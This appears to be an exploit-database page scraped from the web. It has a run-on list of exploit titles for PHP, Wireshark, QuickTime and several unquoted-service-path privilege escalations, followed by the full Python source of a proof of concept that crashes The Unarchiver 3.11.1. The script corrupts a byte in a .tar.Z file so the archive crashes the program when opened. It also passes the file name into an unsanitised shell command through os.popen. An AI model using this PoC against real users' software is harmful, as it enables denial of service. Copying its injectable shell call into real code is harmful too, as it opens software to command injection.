77b46b2163
13 new exploits PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC) PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit PHP FFI Extension 5.0.5 - Local Safe_mode Bypass PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC) PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC) Apple QuickTime < 7.2 - SMIL Remote Integer Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC) Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow Integramod nederland 1.4.2 - Remote File Inclusion Integramod Nederland 1.4.2 - Remote File Inclusion CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation The Unarchiver 3.11.1 - '.tar.Z' Crash PoC XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation
39 lines
No EOL
1.2 KiB
Python
Executable file
39 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
|
|
# Date: 10-17-2016
|
|
# Exploit Author: Antonio Z.
|
|
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
|
|
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
|
|
# Version: 3.11.1
|
|
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
|
|
|
|
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
|
|
|
|
import os, struct, sys
|
|
from mmap import mmap
|
|
|
|
if len(sys.argv) <= 1:
|
|
print "Usage: python Local_Crash_PoC.py [file name]"
|
|
exit()
|
|
|
|
file_name = sys.argv[1]
|
|
file_mod = open(file_name, 'r+b')
|
|
file_hash = file_mod.read()
|
|
|
|
def get_extension(file_name):
|
|
basename = os.path.basename(file_name)
|
|
extension = '.'.join(basename.split('.')[1:])
|
|
return '.' + extension if extension else None
|
|
|
|
def file_maping():
|
|
maping = mmap(file_mod.fileno(),0)
|
|
maping.seek(2)
|
|
maping.write_byte(struct.pack('B', 255))
|
|
maping.close()
|
|
|
|
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
|
|
|
|
os.popen('cp ' + file_name + ' ' + new_file_name)
|
|
file_mod = open(new_file_name, 'r+b')
|
|
file_maping()
|
|
file_mod.close()
|
|
print '[+] ' + 'Created file: ' + new_file_name |